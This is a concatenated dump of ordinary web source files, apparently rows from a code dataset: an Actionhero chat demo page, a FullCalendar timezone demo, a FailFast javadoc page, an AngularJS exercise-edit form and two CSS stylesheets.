client.on('reconnecting', function(){ console.log('reconnecting') })
// client.on('message', function(message){ console.log(message) })
client.on('alert', function(message){ alert( JSON.stringify(message) ) })
client.on('api', function(message){ alert( JSON.stringify(message) ) })
client.on('welcome', function(message){ appendMessage(message); })
client.on('say', function(message){ appendMessage(message); })
client.connect(function(error, details){
if(error != null){
console.log(error);
}else{
client.action('createChatRoom', {name: 'defaultRoom'}, function(data){
console.log(data)
client.roomAdd("defaultRoom", function(error){ if(error){ console.log(error);} });
document.getElementById("name").innerHTML = "<span style=\"color:#" + intToARGB(hashCode(client.id)) + "\">" + client.id + "</span>";
});
}
});
}
var appendMessage = function(message){
var s = "";
s += "<pre>"
if (message.welcome != null){
s += "<div align=\"center\">*** " + message.welcome + " ***</div>";
s += "<div align=\"center\"><img src=\"logo/actionhero.png\" width=\"100\" /></div>";
}else{
s += " " + formatTime(message.sentAt);
s += "<span style=\"color:#" + intToARGB(hashCode(message.from)) + "\">"
s += " [";
if(message.me === true){ s += "<strong>"; }
s += message.from;
if(message.me === true){ s += "</strong>"; }
s += "] ";
s += "</span>"
s += message.message;
}
s += "</pre>"
var div = document.getElementById("chatBox");
div.innerHTML = s + div.innerHTML;
}
var sendMessage = function(){
var div = document.getElementById("message");
var message = div.value;
div.value = "";
client.say(client.rooms[0], message);
}
var formatTime = function(timestamp){
return new Date(timestamp).toLocaleTimeString()
}
function hashCode(str) { // java String#hashCode
var hash = 0;
for (var i = 0; i < str.length; i++) {
hash = str.charCodeAt(i) + ((hash << 5) - hash);
}
return hash;
}
function intToARGB(i){
var color =
((i>>24)&0xFF).toString(16) +
((i>>16)&0xFF).toString(16) +
((i>> 8)&0xFF).toString(16) +
(i&0xFF).toString(16);
return color.substring(0, 6);
}
</script>
</head>
<body onload="boot()">
<!-- <section class="content-section text-center">
<div class="features-section">
<div class="container">
<h2>Real-Time Chat with Actionhero</h2>
</div>
</div>
</section> -->
<section class="intro">
<div class="thin-intro-body">
<div class="container">
<div class="row">
<div class="col-md-8 col-md-offset-2">
<br />
<h1>Real-Time Chat with Actionhero</h1>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-4 col-sm-4 col-lg-4">
Hello, <strong><span id="name"></span></strong>
<form id="messageForm" class="form-inline">
<div class="form-group">
<label class="sr-only">Chat Message</label>
<div class="input-group">
<div class="input-group-addon"></div>
<input type="text" class="form-control" id="message" placeholder="Your Message">
<div class="input-group-addon"></div>
</div>
</div>
<br>
<br>
<button type="submit" class="btn btn-primary">Send Message</button>
</form>
</div>
<div class="col-8 col-sm-8 col-lg-8">
<div class="server_info" id="actions">
<br>
<div class="chatBox" id="chatBox">
</div>
</div>
</div>
</div>
</div>
</section>
<!-- <div class="body_container">
<div class="server_info">
<div class="box"><div class="left">Name:</div><span id="name"></span></div>
<div class="box"><div class="left">Message:</div>
<form id="messageForm" name="messageForm" action="#">
<input type="text" name="message" size="90" id="message"> <a href="javascript:sendMessage()">[ send ]</a>
</form>
</div>
</div>
</div>
<div class="body_container">
<h2>Chat:</h2>
<div class="server_info" id="actions">
<div class="chatBox" id="chatBox">...</div>
</div>
</div> -->
</body>
<script>
document.getElementById('messageForm').addEventListener('submit', function(e){ e.preventDefault(); sendMessage(); }, false);
</script>
</html>
|
webroot/resources/fullcalendar/demos/timezones.html
|
microuser/HTML4PHP
|
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8' />
<link href='../dist/fullcalendar.css' rel='stylesheet' />
<link href='../dist/fullcalendar.print.css' rel='stylesheet' media='print' />
<script src='../lib/moment/moment.js'></script>
<script src='../lib/jquery/dist/jquery.js'></script>
<script src='../dist/fullcalendar.js'></script>
<script>
$(document).ready(function() {
var currentTimezone = false;
// load the list of available timezones
$.getJSON('php/get-timezones.php', function(timezones) {
$.each(timezones, function(i, timezone) {
if (timezone != 'UTC') { // UTC is already in the list
$('#timezone-selector').append(
$("<option/>").text(timezone).attr('value', timezone)
);
}
});
});
// when the timezone selector changes, rerender the calendar
$('#timezone-selector').on('change', function() {
currentTimezone = this.value || false;
$('#calendar').fullCalendar('destroy');
renderCalendar();
});
function renderCalendar() {
$('#calendar').fullCalendar({
header: {
left: 'prev,next today',
center: 'title',
right: 'month,agendaWeek,agendaDay'
},
defaultDate: '2014-11-12',
timezone: currentTimezone,
editable: true,
eventLimit: true, // allow "more" link when too many events
events: {
url: 'php/get-events.php',
error: function() {
$('#script-warning').show();
}
},
loading: function(bool) {
$('#loading').toggle(bool);
},
eventRender: function(event, el) {
// render the timezone offset below the event title
if (event.start.hasZone()) {
el.find('.fc-title').after(
$('<div class="tzo"/>').text(event.start.format('Z'))
);
}
}
});
}
renderCalendar();
});
</script>
<style>
body {
margin: 0;
padding: 0;
font-family: "Lucida Grande",Helvetica,Arial,Verdana,sans-serif;
font-size: 14px;
}
#top {
background: #eee;
border-bottom: 1px solid #ddd;
padding: 0 10px;
line-height: 40px;
font-size: 12px;
}
.left { float: left }
.right { float: right }
.clear { clear: both }
#script-warning, #loading { display: none }
#script-warning { font-weight: bold; color: red }
#calendar {
max-width: 900px;
margin: 40px auto;
padding: 0 10px;
}
.tzo {
color: #000;
}
</style>
</head>
<body>
<div id='top'>
<div class='left'>
Timezone:
<select id='timezone-selector'>
<option value='' selected>none</option>
<option value='local'>local</option>
<option value='UTC'>UTC</option>
</select>
</div>
<div class='right'>
<span id='loading'>loading...</span>
<span id='script-warning'><code>php/get-events.php</code> must be running.</span>
</div>
<div class='clear'></div>
</div>
<div id='calendar'></div>
</body>
</html>
|
Java/Web/war/releases/1.3/api/starkcoder/failfast/fails/objects/enums/class-use/IObjectEnumNullFail.html
|
KeldOelykke/FailFast
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_45) on Mon Aug 31 23:15:52 CEST 2015 -->
<title>Uses of Interface starkcoder.failfast.fails.objects.enums.IObjectEnumNullFail (FailFast v.1.3)</title>
<meta name="date" content="2015-08-31">
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Interface starkcoder.failfast.fails.objects.enums.IObjectEnumNullFail (FailFast v.1.3)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?starkcoder/failfast/fails/objects/enums/class-use/IObjectEnumNullFail.html" target="_top">Frames</a></li>
<li><a href="IObjectEnumNullFail.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Interface starkcoder.failfast.fails.objects.enums.IObjectEnumNullFail" class="title">Uses of Interface<br>starkcoder.failfast.fails.objects.enums.IObjectEnumNullFail</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#starkcoder.failfast.fails">starkcoder.failfast.fails</a></td>
<td class="colLast"> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><a href="#starkcoder.failfast.fails.objects">starkcoder.failfast.fails.objects</a></td>
<td class="colLast"> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><a href="#starkcoder.failfast.fails.objects.enums">starkcoder.failfast.fails.objects.enums</a></td>
<td class="colLast"> </td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="starkcoder.failfast.fails">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a> in <a href="../../../../../../starkcoder/failfast/fails/package-summary.html">starkcoder.failfast.fails</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subinterfaces, and an explanation">
<caption><span>Subinterfaces of <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a> in <a href="../../../../../../starkcoder/failfast/fails/package-summary.html">starkcoder.failfast.fails</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Interface and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>interface </code></td>
<td class="colLast"><code><strong><a href="../../../../../../starkcoder/failfast/fails/IFailer.html" title="interface in starkcoder.failfast.fails">IFailer</a></strong></code>
<div class="block">Failer specification.</div>
</td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing classes, and an explanation">
<caption><span>Classes in <a href="../../../../../../starkcoder/failfast/fails/package-summary.html">starkcoder.failfast.fails</a> that implement <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Class and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><strong><a href="../../../../../../starkcoder/failfast/fails/AFailer.html" title="class in starkcoder.failfast.fails">AFailer</a></strong></code>
<div class="block">Abstract implementation of <a href="../../../../../../starkcoder/failfast/fails/IFailer.html" title="interface in starkcoder.failfast.fails"><code>IFailer</code></a>.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><strong><a href="../../../../../../starkcoder/failfast/fails/Failer.html" title="class in starkcoder.failfast.fails">Failer</a></strong></code>
<div class="block">Default concrete implementation of <a href="../../../../../../starkcoder/failfast/fails/IFailer.html" title="interface in starkcoder.failfast.fails"><code>IFailer</code></a> using abstract implementation <a href="../../../../../../starkcoder/failfast/fails/AFailer.html" title="class in starkcoder.failfast.fails"><code>AFailer</code></a>.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList"><a name="starkcoder.failfast.fails.objects">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a> in <a href="../../../../../../starkcoder/failfast/fails/objects/package-summary.html">starkcoder.failfast.fails.objects</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subinterfaces, and an explanation">
<caption><span>Subinterfaces of <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a> in <a href="../../../../../../starkcoder/failfast/fails/objects/package-summary.html">starkcoder.failfast.fails.objects</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Interface and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>interface </code></td>
<td class="colLast"><code><strong><a href="../../../../../../starkcoder/failfast/fails/objects/IObjectFailer.html" title="interface in starkcoder.failfast.fails.objects">IObjectFailer</a></strong></code>
<div class="block">Specification grouping all object fail specifications.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList"><a name="starkcoder.failfast.fails.objects.enums">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a> in <a href="../../../../../../starkcoder/failfast/fails/objects/enums/package-summary.html">starkcoder.failfast.fails.objects.enums</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subinterfaces, and an explanation">
<caption><span>Subinterfaces of <a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumNullFail</a> in <a href="../../../../../../starkcoder/failfast/fails/objects/enums/package-summary.html">starkcoder.failfast.fails.objects.enums</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Interface and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>interface </code></td>
<td class="colLast"><code><strong><a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumFailer.html" title="interface in starkcoder.failfast.fails.objects.enums">IObjectEnumFailer</a></strong></code>
<div class="block">Specification grouping all Enum fail specifications.</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../starkcoder/failfast/fails/objects/enums/IObjectEnumNullFail.html" title="interface in starkcoder.failfast.fails.objects.enums">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?starkcoder/failfast/fails/objects/enums/class-use/IObjectEnumNullFail.html" target="_top">Frames</a></li>
<li><a href="IObjectEnumNullFail.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small><i>The MIT License (MIT) - Copyright © 2014-2015 Keld Oelykke. All Rights Reserved.</i></small></p>
</body>
</html>
|
packages/custom/algos/public/views/edit.html
|
zwhitchcox/lex
|
<section ng-controller="AlgosExerciseEditController" ng-init="findSubjects();findOne()">
<a ng-href="/edit/algos/{{exercise.subject.name}}/exercises" class="back">
<i class="glyphicon glyphicon-menu-left"></i>
</a>
<form class="form-horizontal" name="exerciseForm" ng-submit="update()">
<div class="form-group">
<label class="col-sm-2 control-label">Subject</label>
<div class="col-md-3 col-sm-4">
<select ng-model="exercise.subject" ng-options="subject as subject.name for subject in subjects" class="form-control">
</select>
</div>
</div>
<div class="form-group">
<label class="col-sm-2 control-label">Module</label>
<div class="col-md-3 col-sm-4">
<select ng-model="exercise.module" ng-options="module as module for module in exercise.subject.modules"
class="form-control" ng-watch="modulesBySubject">
</select>
</div>
</div>
<div class="form-group">
<label class="col-sm-2 control-label">Name</label>
<div class="col-md-3 col-sm-4">
<input ng-model="exercise.name" class="form-control">
</select>
</div>
</div>
<div class="form-group">
<label class="col-sm-2 control-label">Challenge</label>
<div class="col-sm-9">
<textarea class="form-control" ng-model="exercise.challenge" rows="3"></textarea>
</div>
</div>
<div class="form-group">
<label class="col-sm-2 control-label">Solution</label>
<div class="col-sm-9">
<textarea class="form-control" ng-model="exercise.solution" rows="3"></textarea>
</div>
</div>
<div class="form-group">
<label class="col-sm-2 control-label">Check</label>
<div class="col-sm-9">
<textarea class="form-control" ng-model="exercise.check" rows="7"
style="font-family:monospace;"></textarea>
</div>
</div>
<div class="form-group">
<label class="col-sm-2 control-label">Start</label>
<div class="col-sm-9">
<textarea class="form-control" ng-model="exercise.start" rows="7"
style="font-family:monospace;"></textarea>
</div>
</div>
<div class="form-group">
<label class="col-sm-2 control-label">Vid</label>
<div class="col-sm-2">
<input class="form-control" ng-model="exercise.vid">
</div>
<label class="col-sm-2 control-label">Vid Start</label>
<div class="col-sm-2">
<input class="form-control" ng-model="exercise.vStart">
</div>
<label class="col-sm-2 control-label">Vid End</label>
<div class="col-sm-2">
<input class="form-control" ng-model="exercise.vEnd">
</div>
</div>
<div class="col-sm-offset-2">
<button type="submit" class="btn btn-info">Save</button>
</div>
</form>
</section>
|
bench/bugs/chrome530964.css
|
uwplse/Cassius
|
.container {
/* border: 1px solid red; */
border-width: 1px;
border-style: solid;
border-color: red;
width: 300px;
height: 800px;
}
.row {
/* border-bottom: 1px solid black; */
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: black;
width: 300px; /* 100% */
height: 66.6666px; /* 8.3333% */
float: left;
}
|
examples/css/styles.css
|
opnsrce/semantic-grid
|
.page__header:after, .page__site-nav:after, .page__site-nav .nav-items:after, .page__content:after, .page__footer:after, .page__hero-image-container:after, .page__company-slogan:after, .page__cities:after {
content: '';
display: table;
visibility: hidden;
clear: both; }
@font-face {
font-weight: normal;
font-style: normal;
font-family: 'BLOKKNeue-Regular';
src: url("fonts/blokk-neue-regular/web/BLOKKNeue-Regular.eot");
src: url("fonts/blokk-neue-regular/web/BLOKKNeue-Regular.eot?#iefix") format("embedded-opentype"), url("fonts/blokk-neue-regular/web/BLOKKNeue-Regular.woff") format("woff"), url("fonts/blokk-neue-regular/web/BLOKKNeue-Regular.svg#BLOKKNeue-Regular") format("svg"); }
html {
padding: 0;
margin: 0;
display: block;
position: relative;
min-height: 100%; }
body {
padding: 20px;
margin: 0;
display: block;
position: relative;
font-family: 'BLOKKNeue-Regular';
font-size: 10px; }
.sample-content {
background-color: #999999;
display: block;
width: 100%;
min-height: 1px;
height: 100%; }
.page {
display: block;
min-height: 100%;
margin: auto;
max-width: 960px;
position: relative;
box-sizing: border-box;
border: solid 1px grey;
font-size: 1rem;
padding-right: 12px; }
.page:before, .page:after {
box-sizing: border-box; }
.page:after {
content: '';
display: table;
visibility: hidden;
clear: both; }
.page__header {
height: 75px; }
.page__logo {
float: left;
min-height: 1px;
position: relative;
width: 33.33333%;
box-sizing: border-box;
padding: 12px 0 12px 12px;
height: 100%; }
.page__logo:before, .page__logo:after {
box-sizing: border-box; }
.page__account-actions {
float: left;
min-height: 1px;
position: relative;
width: 66.66667%;
box-sizing: border-box;
padding: 12px 0 12px 12px;
height: 100%; }
.page__account-actions:before, .page__account-actions:after {
box-sizing: border-box; }
.page__site-nav {
height: 25px; }
.page__site-nav .nav-items {
height: 100%;
margin: 0;
padding: 0;
list-style-type: none; }
.page__site-nav .nav-item {
float: left;
min-height: 1px;
position: relative;
width: 25%;
box-sizing: border-box;
padding-top: 0;
padding-bottom: 0;
padding-left: 12px;
height: 100%;
list-style-type: none;
text-align: center; }
.page__site-nav .nav-item:before, .page__site-nav .nav-item:after {
box-sizing: border-box; }
.page__site-nav .sample-content {
height: 25px; }
.page__footer {
height: 75px;
float: left;
min-height: 1px;
position: relative;
width: 100%;
box-sizing: border-box;
padding-top: 0;
padding-bottom: 12px;
padding-left: 12px; }
.page__footer:before, .page__footer:after {
box-sizing: border-box; }
@media (max-width: 645px) {
.page__footer {
float: left;
min-height: 1px;
position: relative;
width: 100%;
box-sizing: border-box;
padding: 12px 0 12px 12px; }
.page__footer:before, .page__footer:after {
box-sizing: border-box; } }
.page__hero-image-container {
float: left;
min-height: 1px;
position: relative;
width: 100%;
box-sizing: border-box;
padding-top: 12px;
padding-bottom: 0;
padding-left: 12px; }
.page__hero-image-container:before, .page__hero-image-container:after {
box-sizing: border-box; }
.page__hero-image-container .hero-image {
background-repeat: no-repeat;
background-size: cover;
border: solid 1px grey;
height: 320px; }
@media (max-width: 430px) {
.page__hero-image-container .hero-image {
height: 150px; } }
.page__hero-image-container .hero-image--seattle {
background-image: url("../img/seattle.svg"); }
.page__company-slogan {
clear: both;
display: block;
height: 50px; }
.page__company-slogan .slogan {
float: left;
min-height: 1px;
position: relative;
width: 16.66667%;
box-sizing: border-box;
padding: 12px 0 12px 12px;
height: 100%; }
.page__company-slogan .slogan:before, .page__company-slogan .slogan:after {
box-sizing: border-box; }
.page__company-slogan .slogan--phrase-2 {
float: right;
min-height: 1px;
position: relative;
width: 16.66667%;
box-sizing: border-box;
padding: 12px 0 12px 12px; }
.page__company-slogan .slogan--phrase-2:before, .page__company-slogan .slogan--phrase-2:after {
box-sizing: border-box; }
.page__company-slogan .slogan--phrase-3 {
float: none;
margin: 0 auto;
min-height: 1px;
position: relative;
width: 16.66667%;
box-sizing: border-box;
padding: 12px 0 12px 12px; }
.page__company-slogan .slogan--phrase-3:before, .page__company-slogan .slogan--phrase-3:after {
box-sizing: border-box; }
.page__city {
float: left;
min-height: 1px;
position: relative;
width: 25%;
box-sizing: border-box;
padding: 12px 0 12px 12px;
color: grey; }
.page__city:before, .page__city:after {
box-sizing: border-box; }
@media (max-width: 645px) {
.page__city {
float: left;
min-height: 1px;
position: relative;
width: 50%;
box-sizing: border-box;
padding-top: 12px;
padding-bottom: 0;
padding-left: 12px; }
.page__city:before, .page__city:after {
box-sizing: border-box; } }
@media (max-width: 430px) {
.page__city {
float: left;
min-height: 1px;
position: relative;
width: 100%;
box-sizing: border-box;
padding-top: 12px;
padding-bottom: 0;
padding-left: 12px; }
.page__city:before, .page__city:after {
box-sizing: border-box; } }
.page__city .city-info {
border: solid 1px gray;
padding: 12px; }
.page__city .city-image {
background-repeat: no-repeat;
background-size: cover;
border: solid 1px grey;
display: block;
height: 150px; }
.page__city .city-image--beijing {
background-image: url("../img/beijing.svg"); }
.page__city .city-image--hong-kong {
background-image: url("../img/hong-kong.svg"); }
.page__city .city-image--kiev {
background-image: url("../img/kiev.svg"); }
.page__city .city-image--new-york {
background-image: url("../img/new-york.svg"); }
.page__city .city-image--seattle {
background-image: url("../img/seattle.svg"); }
.page__city .city-description {
padding-top: 12px; }
/*# sourceMappingURL=styles.css.map */
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.